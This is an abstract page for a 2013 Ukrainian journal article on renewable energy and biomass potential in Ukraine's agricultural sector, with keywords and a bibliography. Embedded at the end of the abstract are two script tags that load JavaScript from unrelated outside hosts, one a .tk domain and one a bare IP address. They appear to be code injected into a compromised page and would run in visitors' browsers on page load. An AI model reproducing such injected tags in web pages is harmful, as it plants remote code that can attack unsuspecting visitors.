ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 621.313.1
Матеріально-технічне забезпечення аграрної сфери

Перспективи розвитку відновлювальної енергетики в Україні / Скорук О. П. // Економіка АПК. - 2013. - № 5 - С. 63

Розглянуто потенціал біомаси в Україні як головне джерело для розвитку відновлювальної енергетики. Досліджено основні нормативно-правові документи у сфері відновлювальних джерел енергії та обґрунтовано необхідність створення уніфікованої програми для розвитку сектору біоенергетики. Розкрито економічні аспекти й перспективи розвитку відновлювальної енергетики в Україні з позицій оцінки досвіду та доцільності формування і використання потенціалу для розв’язання енергетичних проблем на сучасному етапі їх виникнення. Визначено особливості здійснення перетворень в економіці України, зокрема щодо розбудови економіко-енергетичних відносин на основі науково-технічного прогресу. Проаналізовано зарубіжний досвід та глобальні проблеми використання відновлювальних джерел енергії на сучасному етапі формування енергетичної безпеки в світі. Окреслено потенціал сільського господарства України у формуванні фундаменту перспектив енергетичної незалежності за рахунок включення галузі в систему продукування джерел енергії, особливо щодо виробництва різних видів біопалив з агропродукції – сировини. Табл.: 3. Бібліогр.: 8.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: відновлювальна енергетика, відновлювальні джерела енергії, потенціал біомаси, «зелений тариф», науково-технічний прогрес, економіко-енергетичні відносини

Список використаних джерел

  1. Блюм Я.Б. Новітні технології біоенергоконверсії: моногр. / Я.Б. Блюм, Г.Г. Гелетуха, І.П. Григорюк та ін.–К.: «Аграр Медіа Груп», 2010. – 326 с.
  2. Блюм Я.Б. Біологічні ресурси і технології виробництва біопалива: моногр. / Я.Б. Блюм, Г.Г. Гелетуха, І.П. Григорюк та ін. – К.: «Аграр Медіа Груп», 2010. – 408 с.
  3. Гелетуха Г.Г. Україна: нетрадиційні та відновлювальні джерела енергії / Г.Г. Гелетуха, С.О. Кудря // Зелена енергетика. – 2005. – №2. – С. 6-8.
  4. Эпик А. Насколько жизнеспособны в Украине национальные программы развития возобновляемой энергетики / А. Эпик // Альтернативное топливо. – 2001. – № 9. – С. 30-35
  5. Калетнік Г.М. Біопаливо. Продовольча, енергетична та екологічна безпека України: моногр. / Г.М. Калетнік. – К.: “Хай-Тек Прес”, 2010. – 516 с.
  6. Кудря С.О. Структурні тенденції в енергетиці Європи і розвиток відновлюваної енергетики в Україні / С.О. Кудря, Б.Г. Турчинський // Відновлювана енергетика. – 2005. – № 1. – С. 36-40.
  7. Месель-Веселяк В.Я. Ефективність альтернативних видів енергії в сільському господарстві України / В.Я. Месель-Веселяк, В.С. Паштецький // Економіка АПК. – 2011. – № 12. – С. 3-9.
  8. Сохацька О.М. Сучасні тенденції на світовому ринку нетрадиційних та відновлювальних джерел енергії / О.М. Сохацька // Энергосбережение, энергетика, энергоаудит. – 2011. – № 11. – 38-51.
Читати статтю: 13_05_10.pdf